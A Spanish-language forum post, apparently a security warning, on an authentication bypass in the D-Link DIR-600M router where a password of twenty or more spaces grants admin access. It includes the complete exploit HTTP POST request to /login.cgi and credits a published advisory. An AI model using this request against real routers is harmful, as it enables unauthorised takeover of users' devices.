D-Link DIR600M: Entrar como root poniendo espacios en la contraseña

[h]Brecha critica en los D-Link DIR600M[/h]
El D-Link DIR600M es un router que es compatible con el modo “repetidor WiFi”
Es un router b/g/n MIMO 1T1R (una antena, hasta 150Mbps) que tiene un punto a su favor:
Lleva una antena externa de 5dBi y la antena es desmontable.
https://www.wifi-libre.com/img/members/3/DIR600M_1.jpg
A pesar de no ser de ultima generación es un modelo interesante: Se puede emplear como repetidor y se puede equipar con una antena de alta ganancia.
D-Link lo sigue produciendo y soportando.
Desgraciadamente tiene un grave fallo a la hora de comprobar la validez de las contraseñas entradas por los usuarios cuando intentan acceder a la interfaz de configuración.
El fallo afecta la cuenta de administrador: ¡Peligro máximo!
Si por desgracia el acceso remoto está habilitado se puede estar seguro de que el router ya forma parte un botnet barato…
Para saltarse los credenciales de un** DIR-600M** debemos entrar veinte (o más) espacios como contraseña para “root”.
¡Le damos a y listo!
Demostración:
[video]youtube.com/watch?v=waIJKWCpyNQring[/video]
La petición maligna tiene esta pinta:

[code]POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send[/code]
La brecha ha sido comprobada en la versión 3.1 del firmware de este dispositivo.
No podemos descartar que más dispositivos “D-Link DIR” estén afectados.
Créditos brecha y fuente
[list=*]
]D-Link DIR-600M Wireless N 150 – Authentication Bypass by touhid shaikh/]
]Publicado también en Packet Storm /]
[/list]